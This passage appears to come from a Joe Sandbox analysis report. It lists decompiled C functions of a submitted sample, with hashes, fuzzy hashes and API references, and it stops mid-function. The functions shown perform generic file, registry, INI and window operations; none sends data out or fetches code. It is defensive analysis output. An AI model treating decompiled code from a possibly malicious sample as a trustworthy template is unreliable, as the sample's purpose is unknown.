Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405af1
0x00405af9
0x00000000
0x00405aff
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
GetLastError.KERNEL32 ref: 00405AFF

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402891 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E00402891(intOrPtr __edx, void* __eflags) {
				long _t8;
				long _t10;
				LONG* _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t16;
				void* _t19;

				_t15 = __edx;
				_pop(ds);
				if(__eflags != 0) {
					_t8 = E00402D84(2);
					_pop(_t14);
					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
					_t10 = SetFilePointer(E0040649D(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
						_push(_t10);
						_push( *((intOrPtr*)(_t19 - 0xc)));
						E00406484();
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x00402891
0x00402891
0x00402892
0x0040289a
0x0040289f
0x004028a0
0x004028af
0x004028b8
0x004028be
0x00402ba1
0x00402ba4
0x00402ba4
0x004028b8
0x00402c2d
0x00402c39

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF

Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
Instruction ID: a13d1cf18dcce6f7d85bed0b4e0fde0de6b16079219dfacd376ffc086bc6f252
Opcode Fuzzy Hash: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
Instruction Fuzzy Hash: D3E09271A04105BFDB01EFA5AE499AEB3B8EF44319B10483BF102F00C1DA794D119B2D

Uniqueness

Uniqueness Score: -1.00%

Function 004023B2 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004023B2(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402DA6(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
					_t13 = E00402DA6(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
					_t11 = E00402DA6(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD

Uniqueness

Uniqueness Score: -1.00%

Function 004063D8 Relevance: 1.5, APIs: 1, Instructions: 24
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
				void* _t7;
				long _t8;
				void* _t9;

				_t7 = E00406329(_a4,  &_a12);
				if(_t7 != 0) {
					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
					return _t8;
				}
				_t9 = 6;
				return _t9;
			}

0x004063e2
0x004063eb
0x00406401
0x00000000
0x00406401
0x004063ef
0x00000000

APIs

RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675

Uniqueness

Uniqueness Score: -1.00%

Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060e3
0x004060f3
0x004060fb
0x00000000
0x00406102
0x00000000
0x00406104

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060b4
0x004060c4
0x004060cc
0x00000000
0x004060d3
0x00000000
0x004060d5

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004015A3() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}

0x004015ae
0x004015b4
0x004015b6
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 47b2afe40cba55761507d4970926e301de26d93e6e1ecc914e53ec7ca2d4fe06
Instruction ID: 33d43a8ddb5fee1851102b8e64c9f064c627007e01bf6cdc746e786b0f5045d9
Opcode Fuzzy Hash: 47b2afe40cba55761507d4970926e301de26d93e6e1ecc914e53ec7ca2d4fe06
Instruction Fuzzy Hash: 30D01772B08110DBDB11DBA8AA48B9D72A4AB50368B208537D111F61D0E6B8C945AA19

Uniqueness

Uniqueness Score: -1.00%

Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044E5(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433ed8; // 0xf0074
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004044e5
0x004044ec
0x004044f7
0x00000000
0x004044f7
0x004044fd

APIs

SendMessageW.USER32(000F0074,00000000,00000000,00000000), ref: 004044F7

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C

Uniqueness

Uniqueness Score: -1.00%

Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044CE(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004044dc
0x004044e2

APIs

SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08

Uniqueness

Uniqueness Score: -1.00%

Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034f3
0x004034f9

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044BB(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d264, _a4); // executed
				return _t2;
			}

0x004044c5
0x004044cb

APIs

KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401FA4(void* __ecx) {
				void* _t9;
				intOrPtr _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t17 = __ecx;
				_t19 = E00402DA6(_t15);
				E0040559F(0xffffffeb, _t7); // executed
				_t9 = E00405B20(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E004069B5(_t17, _t20);
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
